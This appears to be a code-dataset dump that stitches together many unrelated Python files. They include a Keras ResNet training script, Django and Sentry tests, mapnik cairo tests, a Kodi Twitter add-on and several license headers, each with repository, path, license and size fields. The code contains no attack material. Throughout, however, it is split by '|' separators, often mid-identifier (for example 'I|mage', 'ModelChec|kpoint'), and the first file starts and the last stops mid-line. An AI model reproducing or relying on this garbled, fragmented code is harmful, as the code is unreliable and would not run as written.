self.assertAllClose(3.0, stepper.get_tensor_value("b/read:0"))
self.assertAllClose(10.0,
stepper.cont("f:0", use_dumped_intermediates=False))
self.assertEqual({}, stepper.last_feed_types())
def testIsFeedableShouldGiveCorrectAnswers(self):
with NodeStepper(self.sess, self.e) as stepper:
self.assertTrue(stepper.is_feedable("a/read:0"))
self.assertTrue(stepper.is_feedable("b/read:0"))
self.assertTrue(stepper.is_feedable("c:0"))
self.assertTrue(stepper.is_feedable("d:0"))
def testOverrideValue(self):
with NodeStepper(self
|
ychab/privagal
|
privagal/core/management/commands/genfactories.py
|
Python
|
bsd-3-clause
| 1,893
| 0
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
import os
import random
from django.conf import settings
from django.core.management.base import BaseCommand
from wagtail.wagtailcore.models import Page
from wagtail.wagtailimages.models import get_image_model
from privagal.gallery.factories import GalleryFactory, ImageFactory
from privagal.gallery.models import Gallery
from privagal.timeline.models import Timeline
ASSETS_PATH = os.path.join(settings.PROJECT_DIR, 'core', 'tests', 'assets')
IMAGES = [
'django.png',
'django-pony.png',
'django-pony-pink.jpg',
'wagtail.png',
'wagtail-space.png',
'python.jpg',
]
Image = get_image_model()
class Command(BaseCommand):
help = 'Generate some data for a demo purpose.'
leave_locale_alone = True
def add_arguments(self, parser):
parser.add_argument('--limit', action='store', type=int, default=5,
help="How many galleries to generate")
parser.add_argument('--purge', action='store_true', default=False,
help="Whether to delete all previous galleries "
"before creating new ones.")
def handle(self, *args, **options):
if options.get('purge'):
Page.objects.type(Gallery).delete()
I
|
mage.objects.all().delete()
images = []
for image in IMAGES:
images.append(
ImageFa
|
ctory(file__from_path=os.path.join(ASSETS_PATH, image)))
timeline = Timeline.objects.last()
for i in range(0, options['limit']):
random.shuffle(images)
gallery = GalleryFactory(images__images=images)
timeline.add_child(instance=gallery)
self.stdout.write(
'Galleries have been generated successfully.',
style_func=self.style.MIGRATE_SUCCESS,
)
|
amoshyc/tthl-code
|
train_resnet.py
|
Python
|
apache-2.0
| 1,324
| 0.005287
|
import json
from datetime import datetime
import numpy as np
import pandas as pd
import tensorflow as tf
from keras.backend.tensorflow_backend import set_session
config = tf.ConfigProto()
config.gpu_options.allow_growth = True
set_session(tf.Session(config=config))
from keras.models import Sequential, Model
from keras.preprocessing import image
from keras.layers import *
from keras.optimizers import *
from keras.applications.resnet50 import ResNet50
from keras.callbacks import ModelChec
|
kpoint, CSVLogger
from myutils import get_callbacks
inp = Input(shape=(224, 224, 3))
x = Batc
|
hNormalization()(inp)
x = ResNet50(weights='imagenet', include_top=False, pooling='max')(x)
x = Dense(16, activation='relu')(x)
x = Dropout(0.5)(x)
x = Dense(1, activation='sigmoid')(x)
model = Model(inputs=inp, outputs=x)
model_arg = {
'loss': 'binary_crossentropy',
'optimizer': 'sgd',
'metrics': ['binary_accuracy']
}
model.compile(**model_arg)
model.summary()
train = np.load('npz/train.npz')
x_train, y_train = train['xs'], train['ys']
val = np.load('npz/val.npz')
x_val, y_val = val['xs'], val['ys']
fit_arg = {
'x': x_train,
'y': y_train,
'batch_size': 40,
'epochs': 50,
'shuffle': True,
'validation_data': (x_val, y_val),
'callbacks': get_callbacks('resnet'),
}
model.fit(**fit_arg)
|
mitsuhiko/sentry
|
tests/sentry/api/endpoints/test_shared_group_details.py
|
Python
|
bsd-3-clause
| 1,141
| 0.000876
|
from __future__ import absolute_import, print_function
from sentry.testutils import APITestCase
class SharedGroupDetailsTest(APITestCase):
def test_simple(self):
self.login_as(user=self.user)
group = self.create_group()
event = self.create_event(group=group)
url = '/api/0/shared/issues/{}/'.format(group.get_share_id())
response = self.client.get(url, format='json')
assert response.status_code == 200, response.content
assert response.data['id'] == str(group.id)
assert response.data['latestEvent']['id'] == str(event.id)
|
assert response.data['project']['slug'] == group.project.slug
assert response.data['project']['organization']['slug'] == group.organization.slug
def test_feature_disabled(self):
self.login_as(user=self.user)
group = self.create_group()
org = group.organization
org.flags.disable_sha
|
red_issues = True
org.save()
url = '/api/0/shared/issues/{}/'.format(group.get_share_id())
response = self.client.get(url, format='json')
assert response.status_code == 404
|
manz/python-mapnik
|
test/python_tests/cairo_test.py
|
Python
|
lgpl-2.1
| 8,571
| 0.015634
|
#!/usr/bin/env python
from __future__ import print_function
import os
import shutil
import mapnik
from nose.tools import eq_
from .utilities import execution_path, run_all
def setup():
# All of the paths used are relative, if we run the tests
# from another directory we need to chdir()
os.chdir(execution_path('.'))
def make_tmp_map():
m = mapnik.Map(512,512)
m.background_color = mapnik.Color('steelblue')
ds = mapnik.MemoryDatasource()
context = mapnik.Context()
context.push('Name')
f = mapnik.Feature(context,1)
f['Name'] = 'Hello'
f.geometry = mapnik.Geometry.from_wkt('POINT (0 0)')
ds.add_feature(f)
s = mapnik.Style()
r = mapnik.Rule()
sym = mapnik.MarkersSymbolizer()
sym.allow_overlap = True
r.symbols.append(sym)
s.rules.append(r)
lyr = mapnik.Layer('Layer')
lyr.datasource = ds
lyr.styles.append('style')
m.append_style('style',s)
m.layers.append(lyr)
return m
def draw_title(m,ctx,text,size=10,color=mapnik.Color('black')):
"""
|
Draw a Map Title near the top of a page."""
middle = m.width/2.0
ctx.set_source_rgba(*cairo_co
|
lor(color))
ctx.select_font_face("DejaVu Sans Book", cairo.FONT_SLANT_NORMAL, cairo.FONT_WEIGHT_NORMAL)
ctx.set_font_size(size)
x_bearing, y_bearing, width, height = ctx.text_extents(text)[:4]
ctx.move_to(middle - width / 2 - x_bearing, 20.0 - height / 2 - y_bearing)
ctx.show_text(text)
def draw_neatline(m,ctx):
w,h = m.width, m.height
ctx.set_source_rgba(*cairo_color(mapnik.Color('black')))
outline = [
[0,0],[w,0],[w,h],[0,h]
]
ctx.set_line_width(1)
for idx,pt in enumerate(outline):
if (idx == 0):
ctx.move_to(*pt)
else:
ctx.line_to(*pt)
ctx.close_path()
inset = 6
inline = [
[inset,inset],[w-inset,inset],[w-inset,h-inset],[inset,h-inset]
]
ctx.set_line_width(inset/2)
for idx,pt in enumerate(inline):
if (idx == 0):
ctx.move_to(*pt)
else:
ctx.line_to(*pt)
ctx.close_path()
ctx.stroke()
def cairo_color(c):
""" Return a Cairo color tuple from a Mapnik Color."""
ctx_c = (c.r/255.0,c.g/255.0,c.b/255.0,c.a/255.0)
return ctx_c
if mapnik.has_pycairo():
import cairo
def test_passing_pycairo_context_svg():
m = make_tmp_map()
m.zoom_to_box(mapnik.Box2d(-180,-90,180,90))
test_cairo_file = '/tmp/mapnik-cairo-context-test.svg'
surface = cairo.SVGSurface(test_cairo_file, m.width, m.height)
expected_cairo_file = './images/pycairo/cairo-cairo-expected.svg'
context = cairo.Context(surface)
mapnik.render(m,context)
draw_title(m,context,"Hello Map",size=20)
draw_neatline(m,context)
surface.finish()
if not os.path.exists(expected_cairo_file) or os.environ.get('UPDATE'):
print('generated expected cairo surface file %s' % expected_cairo_file)
shutil.copy(test_cairo_file,expected_cairo_file)
diff = abs(os.stat(expected_cairo_file).st_size-os.stat(test_cairo_file).st_size)
msg = 'diff in size (%s) between actual (%s) and expected(%s)' % (diff,test_cairo_file,'tests/python_tests/'+ expected_cairo_file)
eq_( diff < 1500, True, msg)
os.remove(test_cairo_file)
def test_passing_pycairo_context_pdf():
m = make_tmp_map()
m.zoom_to_box(mapnik.Box2d(-180,-90,180,90))
test_cairo_file = '/tmp/mapnik-cairo-context-test.pdf'
surface = cairo.PDFSurface(test_cairo_file, m.width, m.height)
expected_cairo_file = './images/pycairo/cairo-cairo-expected.pdf'
context = cairo.Context(surface)
mapnik.render(m,context)
draw_title(m,context,"Hello Map",size=20)
draw_neatline(m,context)
surface.finish()
if not os.path.exists(expected_cairo_file) or os.environ.get('UPDATE'):
print('generated expected cairo surface file %s' % expected_cairo_file)
shutil.copy(test_cairo_file,expected_cairo_file)
diff = abs(os.stat(expected_cairo_file).st_size-os.stat(test_cairo_file).st_size)
msg = 'diff in size (%s) between actual (%s) and expected(%s)' % (diff,test_cairo_file,'tests/python_tests/'+ expected_cairo_file)
eq_( diff < 1500, True, msg)
os.remove(test_cairo_file)
def test_passing_pycairo_context_png():
m = make_tmp_map()
m.zoom_to_box(mapnik.Box2d(-180,-90,180,90))
test_cairo_file = '/tmp/mapnik-cairo-context-test.png'
surface = cairo.ImageSurface(cairo.FORMAT_ARGB32, m.width, m.height)
expected_cairo_file = './images/pycairo/cairo-cairo-expected.png'
expected_cairo_file2 = './images/pycairo/cairo-cairo-expected-reduced.png'
context = cairo.Context(surface)
mapnik.render(m,context)
draw_title(m,context,"Hello Map",size=20)
draw_neatline(m,context)
surface.write_to_png(test_cairo_file)
reduced_color_image = test_cairo_file.replace('png','-mapnik.png')
im = mapnik.Image.from_cairo(surface)
im.save(reduced_color_image,'png8')
surface.finish()
if not os.path.exists(expected_cairo_file) or os.environ.get('UPDATE'):
print('generated expected cairo surface file %s' % expected_cairo_file)
shutil.copy(test_cairo_file,expected_cairo_file)
diff = abs(os.stat(expected_cairo_file).st_size-os.stat(test_cairo_file).st_size)
msg = 'diff in size (%s) between actual (%s) and expected(%s)' % (diff,test_cairo_file,'tests/python_tests/'+ expected_cairo_file)
eq_( diff < 500, True, msg)
os.remove(test_cairo_file)
if not os.path.exists(expected_cairo_file2) or os.environ.get('UPDATE'):
print('generated expected cairo surface file %s' % expected_cairo_file2)
shutil.copy(reduced_color_image,expected_cairo_file2)
diff = abs(os.stat(expected_cairo_file2).st_size-os.stat(reduced_color_image).st_size)
msg = 'diff in size (%s) between actual (%s) and expected(%s)' % (diff,reduced_color_image,'tests/python_tests/'+ expected_cairo_file2)
eq_( diff < 500, True, msg)
os.remove(reduced_color_image)
if 'sqlite' in mapnik.DatasourceCache.plugin_names():
def _pycairo_surface(type,sym):
test_cairo_file = '/tmp/mapnik-cairo-surface-test.%s.%s' % (sym,type)
expected_cairo_file = './images/pycairo/cairo-surface-expected.%s.%s' % (sym,type)
m = mapnik.Map(256,256)
mapnik.load_map(m,'../data/good_maps/%s_symbolizer.xml' % sym)
m.zoom_all()
if hasattr(cairo,'%sSurface' % type.upper()):
surface = getattr(cairo,'%sSurface' % type.upper())(test_cairo_file, m.width,m.height)
mapnik.render(m, surface)
surface.finish()
if not os.path.exists(expected_cairo_file) or os.environ.get('UPDATE'):
print('generated expected cairo surface file %s' % expected_cairo_file)
shutil.copy(test_cairo_file,expected_cairo_file)
diff = abs(os.stat(expected_cairo_file).st_size-os.stat(test_cairo_file).st_size)
msg = 'diff in size (%s) between actual (%s) and expected(%s)' % (diff,test_cairo_file,'tests/python_tests/'+ expected_cairo_file)
if os.uname()[0] == 'Darwin':
eq_( diff < 2100, True, msg)
else:
eq_( diff < 23000, True, msg)
os.remove(test_cairo_file)
return True
else:
print('skipping cairo.%s test since surface is not available' % type.upper())
return True
def test_pycairo_svg_surface1():
eq_(_pycairo_surface('svg','point'),True)
def test_pycairo_svg_surface2():
eq_(_pycairo_surface('svg','building'),True)
def test_pycairo_svg_surface3():
eq_(_pycairo_surface('svg','polygon'),True)
|
Zymo-Research/mirror-seq
|
setup.py
|
Python
|
apache-2.0
| 939
| 0.017039
|
from setuptools import setup
exec(open('mirror_seq/v
|
ersion.py').read())
LONG_DESCRIPTION = '''
Please visit the GitHub repo (https://github.com/Zymo-Research/mirror-seq) for detail information.
'''
INSTALL_REQUIRES = [
'pandas>=0.18.0',
'pysam>=0.9.0',
'cutadapt==1.9.1',
]
setup(name='mirror_seq',
version=__version__,
description='The bioinformatics tool for Mirror-seq.',
long_description=LONG_DESCRIPTION,
url='https://github.com/Zymo-Research/mirror-seq',
author=
|
'Hunter Chung',
author_email='b89603112@gmail.com',
licence='Apache License 2.0',
scripts=['bin/mirror-seq', 'bin/mirror-trim', 'bin/mirror-call'],
packages=['mirror_seq'],
test_suite='nose.collector',
tests_require=['nose'],
install_requires=INSTALL_REQUIRES,
classifiers=['Programming Language :: Python :: 2.7'],
keywords='mirror sequencing next-gen hydroxymethylation bisulfite bioinformatics')
|
CalvinHsu1223/LinuxCNC-EtherCAT-HAL-Driver
|
configs/sim/remap/manual-toolchange-with-tool-length-switch/python/gladevcp-handler.py
|
Python
|
gpl-2.0
| 801
| 0.014981
|
#!/usr/bin/env python
import hal
class HandlerClass:
def on_led_change(self,hal_led,data=None):
'''
the gladevcp.change led had a transition
'''
if hal_led.hal_pin.get():
if self.halcomp["number"] > 0.0:
self.change_text.set_label("Insert too number %d" % (int(self.halcomp["number"])))
else:
self.change_text.set_label("Remove tool")
else:
self.change_text.set_label("")
def __init__(self, halcomp,builder,useropts):
self.halcomp = halcomp
self.change_text = builder.get_object("change-text")
self.halcomp.newpin("n
|
umber", hal.HAL_FLOAT, hal.HAL_IN)
def get
|
_handlers(halcomp,builder,useropts):
return [HandlerClass(halcomp,builder,useropts)]
|
googleapis/python-dialogflow-cx
|
samples/generated_samples/dialogflow_v3_generated_flows_validate_flow_sync.py
|
Python
|
apache-2.0
| 1,436
| 0.000696
|
# -*- coding: utf-8 -*-
# Copyright 2022 Google LLC
#
# Licensed under the Apache
|
License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the Lic
|
ense is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Generated code. DO NOT EDIT!
#
# Snippet for ValidateFlow
# NOTE: This snippet has been automatically generated for illustrative purposes only.
# It may require modifications to work in your environment.
# To install the latest published package dependency, execute the following:
# python3 -m pip install google-cloud-dialogflowcx
# [START dialogflow_v3_generated_Flows_ValidateFlow_sync]
from google.cloud import dialogflowcx_v3
def sample_validate_flow():
# Create a client
client = dialogflowcx_v3.FlowsClient()
# Initialize request argument(s)
request = dialogflowcx_v3.ValidateFlowRequest(
name="name_value",
)
# Make the request
response = client.validate_flow(request=request)
# Handle the response
print(response)
# [END dialogflow_v3_generated_Flows_ValidateFlow_sync]
|
trosa/forca
|
scripts/cleanhtml.py
|
Python
|
gpl-2.0
| 2,334
| 0.065981
|
import sys
import re
def cleancss(text):
text=re.compile('\s+').sub(' ', text)
text=re.compile('\s*(?P<a>,|:)\s*').sub('\g<a> ', text)
text=re.compile('\s*;\s*').sub(';\n ', text)
text=re.compile('\s*\{\s*').sub(' {\n ', text)
text=re.compile('\s*\}\s*').sub('\n}\n\n', text)
return text
def cleanhtml(text):
text=text.lower()
r=re.compile('\<script.+?/script\>', re.DOTALL)
scripts=r.findall(text)
text=r.sub('<script />', text)
r=re.compile('\<style.+?/style\>', re.DOTALL)
styles=r.findall(text)
text=r.sub('<style />', text)
text=re.compile(
'<(?P<tag>(input|meta|link|hr|br|img|param))(?P<any>[^\>]*)\s*(?<!/)>')\
.sub('<\g<tag>\g<any> />', text)
text=text.replace('\n', ' ')
text=text.replace('>', '>\n')
text=text.replace('<', '\n<')
text=re.compile('\s*\n\s*').sub('\n', text)
lines=text.split('\n')
(indent, newlines)=(0, [])
for line in lines:
if line[:2]=='</': indent=indent-1
newlines.append(indent*' '+line)
if not line[:2]=='</' and line[-1:]=='>' and \
not line[-2:] in ['/>', '->']: indent=indent+1
text='\n'.join(newlines)
text=re.compile('\<div(?P<a>( .+)?)\>\s+\</div\>').sub('<div\g<a>></div>',text)
text=re.compile('\<a(?P<a>( .+)?)\>\s+(?P<b>[\w\s\(\)\/]+?)\s+\</a\>').sub('<a\g<a>>\g<b></a>',text)
text=re.compile('\<b(?P<a>( .+)?)\>\s+(?P<b>[\w\s\(\)\/]+?)\s+\</b\>').sub('<b\g<a>>\g<b></b>',text)
text=re.compile('\<i(?P<a>( .+)?)\>\s+(?P<b>[\w\s\(\)\/]+?)\s+\</i\>').sub('<i\g<a>>\g<b></i>',text)
text=re.compile('\<span(?P<a>( .+)?)\>\s+(?P<b>[\w\s\(\)\/]+?)\s+\</span\>').sub('<span\g<a>>\g<b></span>',text)
text=re.compile('\
|
s+\<br(?P<a>.*?)\/\>').sub('<br\g<a>/>',text)
text=re.compile('\>(?P<a>\s+)(?P<b>[\.\,\:\;])').sub('>\g<b>\g<a>',text)
text=re.compile('\n\s*
|
\n').sub('\n',text)
for script in scripts:
text=text.replace('<script />', script, 1)
for style in styles:
text=text.replace('<style />', cleancss(style), 1)
return text
def read_file(filename):
f = open(filename, 'r')
try:
return f.read()
finally:
f.close()
file=sys.argv[1]
if file[-4:]=='.css':
print cleancss(read_file(file))
if file[-5:]=='.html':
print cleanhtml(read_file(file))
|
idl3r/Ropper
|
ropperapp/loaders/pe_intern/__init__.py
|
Python
|
gpl-2.0
| 729
| 0
|
#!/usr/bin/env python2
# coding=utf-8
#
# Copyright 2014 Sascha Schirra
#
# This file is part of Ropper.
#
# Ropper is free software: you can redistribute it and/or modify
# it under the t
|
erms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ropper is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should
|
have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
|
yuxiang-zhou/menpo
|
menpo/model/vectorizable.py
|
Python
|
bsd-3-clause
| 6,200
| 0.000484
|
class VectorizableBackedModel(object):
r"""
Mixin for models constructed from a set of :map:`Vectorizable` objects.
Supports models for which visualizing the meaning of a set of components
is trivial.
Requires that the following methods are implemented:
1. `component_vector(index)`
2. `instance_vector(weights)`
3. `project_vector(vector)`
4. `reconstruct_vector(vectors)`
5. `project_out_vector(vector)`
The constructor takes an instance of :map:`Vectorizable`. This is used for
all conversions to and from numpy vectors and instances.
Parameters
----------
template_instance : :map:`Vectorizable`
The template instance.
"""
def __init__(self, template_instance):
self.template_instance = template_instance
def component_vector(self, index):
r"""
A particular component of the model, in vectorized form.
Parameters
----------
index : `int`
The component that is to be returned.
Returns
-------
component_vector : `ndarray`
The component vector.
"""
raise NotImplementedError()
def component(self, index):
r"""
A particular component of the model.
Parameters
----------
index : `int`
The component that is to be returned.
Returns
-------
component : `type(self.template_instance)`
The component instance.
"""
return self.template_instance.from_vector(self.component_vector(index))
def instance_vector(self, weights):
"""
Creates a new vector instance of the model using the first ``len(weights)``
components.
Parameters
----------
weights : ``(n_weights,)`` `ndarray` or `list`
``weights[i]`` is the linear contribution of the i'th component
to the instance vector.
Raises
------
ValueError
If n_weights > n_components
Returns
-------
instance_vector : `ndarray`
An instance of the model, in vectorized form.
"""
raise NotImplementedError()
def instance(self, weights):
"""
Creates a new instance of the model using the first ``len(weights)``
components.
Parameters
----------
weights : ``(n_weights,)`` `ndarray` or `list`
``weights[i]`` is the linear contribution of the i'th component
to the instance vector.
Raises
------
ValueError
If n_weights > n_components
Returns
-------
instance : `type(self.template_instance)`
An instance of the model.
"""
return self.template_instance.from_vector(
self.instance_vector(weights))
def project_vector(self, instance_vector):
"""
Projects the `instance_vector` onto the model, retrieving the optimal
linear weightings.
Parameters
----------
instance_vector : `ndarray`
A novel instance vector.
Returns
-------
projected_vector : ``(n_components,)`` `ndarray`
A vector of optimal linear weightings.
"""
raise NotImplementedError()
def project(self, instance):
"""
Projects the `instance` onto the model, retrieving the optimal
linear weightings.
Par
|
ameters
----------
instance : :map:`Vectorizable`
A novel instance.
Returns
-------
projected : ``(n_components,)`` `ndarray`
A vector of optimal linear weightings.
"""
retur
|
n self.project_vector(instance.as_vector())
def reconstruct_vector(self, instance_vector):
"""
Projects an `instance_vector` onto the linear space and rebuilds from the
weights found.
Syntactic sugar for: ::
instance_vector(project_vector(instance_vector))
but faster, as it avoids the conversion that takes place each time.
Parameters
----------
instance_vector : `ndarray`
A novel instance vector.
Returns
-------
reconstructed_vector : `ndarray`
The reconstructed vector.
"""
raise NotImplementedError()
def reconstruct(self, instance):
"""
Projects a `instance` onto the linear space and rebuilds from the
weights found.
Syntactic sugar for: ::
instance(project(instance))
but faster, as it avoids the conversion that takes place each time.
Parameters
----------
instance : :class:`Vectorizable`
A novel instance of :class:`Vectorizable`.
Returns
-------
reconstructed : `self.instance_class`
The reconstructed object.
"""
reconstruction_vector = self.reconstruct_vector(instance.as_vector())
return instance.from_vector(reconstruction_vector)
def project_out_vector(self, instance_vector):
"""
Returns a version of `instance_vector` where all the basis of the model
have been projected out.
Parameters
----------
instance_vector : `ndarray`
A novel instance vector.
Returns
-------
projected_out_vector : `ndarray`
A copy of `instance_vector`, with all bases of the model projected out.
"""
raise NotImplementedError()
def project_out(self, instance):
"""
Returns a version of `instance` where all the basis of the model
have been projected out.
Parameters
----------
instance : :class:`Vectorizable`
A novel instance of :class:`Vectorizable`.
Returns
-------
projected_out : `self.instance_class`
A copy of `instance`, with all basis of the model projected out.
"""
vector_instance = self.project_out_vector(instance.as_vector())
return instance.from_vector(vector_instance)
|
erwindl0/python-rpc
|
org.eclipse.triquetrum.python.service/scripts/scisoftpy/python/pycomparisons.py
|
Python
|
epl-1.0
| 1,127
| 0.008873
|
###
# Copyright 2011 Diamond Light Source Ltd.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
###
'''
Comparisons package
'''
import numpy as _np #@UnresolvedImport
all = _np.all #@ReservedAssignment
any = _np.any #@ReservedAssignment
greater = _np.greater
greater_equal = _np.greater_equal
less = _np.less
less_equal = _np.less_equal
equal = _np.equal
not_equal = _np.not_equal
logical_no
|
t = _np.logical_not
logical_and = _np.logical_and
logical_or = _np.logical_or
logical_xor = _np.logical_xor
allclose = _np.allc
|
lose
nonzero = _np.nonzero
where = _np.where
iscomplex = _np.iscomplex
isreal = _np.isreal
|
enen92/script.matchcenter
|
resources/lib/tweets.py
|
Python
|
gpl-2.0
| 4,506
| 0.025522
|
# -*- coding: utf-8 -*-
'''
script.matchcenter - Football information for Kodi
A program addon that can be mapped to a key on your remote to display football information.
Livescores, Event details, Line-ups, League tables, next and previous matches by team. Follow what
others are saying about the match in twitter.
Copyright (C) 2016 enen92
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
'''
import xbmcgui
import xbmc
import datetime
import json
import mainmenu
import os
from resources.lib.utilities import tweet
from resources.lib.utilities.addonfileio import FileIO
from resources.lib.utilities import ssutils
from resources.lib.utilities.common_addon import *
class TwitterDialog(xbmcgui.WindowXMLDialog):
def __init__( self, *args, **kwargs ):
self.isRunning = True
self.hash = kwargs["hash"]
self.standalone = kwargs["standalone"]
self.teamObjs = {}
def onInit(self):
xbmc.log(msg="[Match Center] Twitter cycle started", level=xbmc.LOGDEBUG)
self.getControl(32540).setImage(os.path.join(addon_path,"resources","img","goal.png"))
x
|
bmc.executebuiltin("SetProperty(loading-script-matchcenter-twitter,1,home)")
self.getTweets()
xbmc.executebuiltin("ClearProperty(loading-script-matchcenter-twitter,Home)")
i=0
while self.isRunning:
if (float(i*200)/(twitter_update_time*60*1000)).is_integer() and ((i*200)/(3*60*1000)) != 0:
self.getTweets()
xbmc.sleep(200)
i += 1
xbmc.log(msg="[Match Center] Twitter cycle stopped", level=xbmc.LOGDEBUG)
def getTweets(self):
self.ge
|
tControl(32500).setLabel("#"+self.hash)
self.getControl(32503).setImage(os.path.join(addon_path,"resources","img","twitter_sm.png"))
tweetitems = []
tweets = tweet.get_hashtag_tweets(self.hash)
if tweets:
for _tweet in tweets:
td = ssutils.get_timedelta_string(datetime.datetime.utcnow() - _tweet["date"])
item = xbmcgui.ListItem(_tweet["text"].replace("\n",""))
item.setProperty("profilepic",_tweet["profilepic"])
item.setProperty("author","[B]" +"@" + _tweet["author"] + "[/B]")
item.setProperty("timedelta", td)
tweetitems.append(item)
self.getControl(32501).reset()
self.getControl(32501).addItems(tweetitems)
if tweetitems:
self.setFocusId(32501)
return
def reset(self):
if os.path.exists(tweet_file):
os.remove(tweet_file)
xbmcgui.Dialog().ok(translate(32000), translate(32045))
return
def stopRunning(self):
self.isRunning = False
self.close()
if not self.standalone:
mainmenu.start()
def onAction(self,action):
if action.getId() == 92 or action.getId() == 10:
self.stopRunning()
def onClick(self,controlId):
if controlId == 32501:
teamid = self.getControl(controlId).getSelectedItem().getProperty("teamid")
matchhistory.start(teamid)
elif controlId == 32514:
self.reset()
def start(twitterhash=None, standalone=False):
if not twitterhash:
userInput = True
if os.path.exists(tweet_file):
twitter_data = json.loads(FileIO.fileread(tweet_file))
twitterhash = twitter_data["hash"]
twitter_mediafile = twitter_data["file"]
if twitter_mediafile == xbmc.getInfoLabel('Player.Filenameandpath'):
userInput = False
else:
userInput = False
if userInput:
dialog = xbmcgui.Dialog()
twitterhash = dialog.input(translate(32046), type=xbmcgui.INPUT_ALPHANUM)
if len(twitterhash) != 0:
twitterhash = twitterhash.replace("#","")
else:
xbmcgui.Dialog().ok(translate(32000), translate(32047))
mainmenu.start()
if twitterhash:
#Save twitter hashtag
if twitter_history_enabled == 'true':
tweet.add_hashtag_to_twitter_history(twitterhash)
if xbmc.getCondVisibility("Player.HasMedia") and save_hashes_during_playback == 'true':
tweet.savecurrenthash(twitterhash)
main = TwitterDialog('script-matchcenter-Twitter.xml', addon_path, getskinfolder(), '', hash=twitterhash, standalone=standalone)
main.doModal()
del main
|
izapolsk/integration_tests
|
cfme/tests/cloud_infra_common/test_events.py
|
Python
|
gpl-2.0
| 3,523
| 0.001419
|
"""This module tests events that are invoked by Cloud/Infra VMs."""
import fauxfactory
i
|
mport pytest
from cfme import test_requirements
from cfme.cloud.provider import CloudProvider
from cfme.cloud.provider.gce import GCEProvider
from cfme.control.explorer.policies import VMControlPolicy
from cfme.infrastructure.provider import InfraProvider
from cfme.infrastructure.provider.kubevirt import KubeVirtProvider
from cfme.markers.env_markers.provider import providers
from cfme.utils.providers import ProviderFilter
from cfme.utils.wait impor
|
t wait_for
all_prov = ProviderFilter(classes=[InfraProvider, CloudProvider],
required_fields=['provisioning', 'events'])
excluded = ProviderFilter(classes=[KubeVirtProvider], inverted=True)
pytestmark = [
pytest.mark.usefixtures('uses_infra_providers', 'uses_cloud_providers'),
pytest.mark.tier(2),
pytest.mark.provider(gen_func=providers, filters=[all_prov, excluded],
scope='module'),
test_requirements.events,
]
@pytest.fixture(scope="function")
def vm_crud(provider, setup_provider_modscope, small_template_modscope):
template = small_template_modscope
base_name = 'test-events-' if provider.one_of(GCEProvider) else 'test_events_'
vm_name = fauxfactory.gen_alpha(20, start=base_name).lower()
collection = provider.appliance.provider_based_collection(provider)
vm = collection.instantiate(vm_name, provider, template_name=template.name)
yield vm
vm.cleanup_on_provider()
@pytest.mark.rhv2
def test_vm_create(request, appliance, vm_crud, provider, register_event):
""" Test whether vm_create_complete event is emitted.
Prerequisities:
* A provider that is set up and able to deploy VMs
Steps:
* Create a Control setup (action, policy, profile) that apply a tag on a VM when
``VM Create Complete`` event comes
* Deploy the VM outside of CFME (directly in the provider)
* Refresh provider relationships and wait for VM to appear
* Assert the tag appears.
Metadata:
test_flag: provision, events
Polarion:
assignee: jdupuy
casecomponent: Events
caseimportance: high
initialEstimate: 1/8h
"""
action = appliance.collections.actions.create(
fauxfactory.gen_alpha(),
"Tag",
dict(tag=("My Company Tags", "Environment", "Development")))
request.addfinalizer(action.delete)
policy = appliance.collections.policies.create(
VMControlPolicy,
fauxfactory.gen_alpha()
)
request.addfinalizer(policy.delete)
policy.assign_events("VM Create Complete")
@request.addfinalizer
def _cleanup():
policy.unassign_events("VM Create Complete")
policy.assign_actions_to_event("VM Create Complete", action)
profile = appliance.collections.policy_profiles.create(
fauxfactory.gen_alpha(), policies=[policy])
request.addfinalizer(profile.delete)
provider.assign_policy_profiles(profile.description)
request.addfinalizer(lambda: provider.unassign_policy_profiles(profile.description))
register_event(target_type='VmOrTemplate', target_name=vm_crud.name, event_type='vm_create')
vm_crud.create_on_provider(find_in_cfme=True)
def _check():
return any(tag.category.display_name == "Environment" and tag.display_name == "Development"
for tag in vm_crud.get_tags())
wait_for(_check, num_sec=300, delay=15, message="tags to appear")
|
oturing/pyun
|
pyun_tests.py
|
Python
|
mit
| 373
| 0
|
# coding:
|
utf-8
"""
>>> from pyun import *
>>> yun = YunBridge('192.168.2.9')
>>> yun.pinMode(13, INPUT)
'input'
>>> yun.digitalRead(13)
0
>>> yun.digitalWrite(13, 1)
1
>>> yun.digitalWrite(13, 0)
0
>>> 0 <= yun.analogRead(5) < 1024
True
"""
import doctest
doctest.testmod(optionflags=doctest.REPORT_ONLY_FIRST_FAILURE)
| |
sevein/archivematica
|
src/dashboard/src/components/ingest/views_NormalizationReport.py
|
Python
|
agpl-3.0
| 4,152
| 0.007225
|
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
#
# This file is part of Archivematica.
#
# Copyright 2010-2013 Artefactual Systems Inc. <http://artefactual.com>
#
# Archivematica is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Archivematica is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
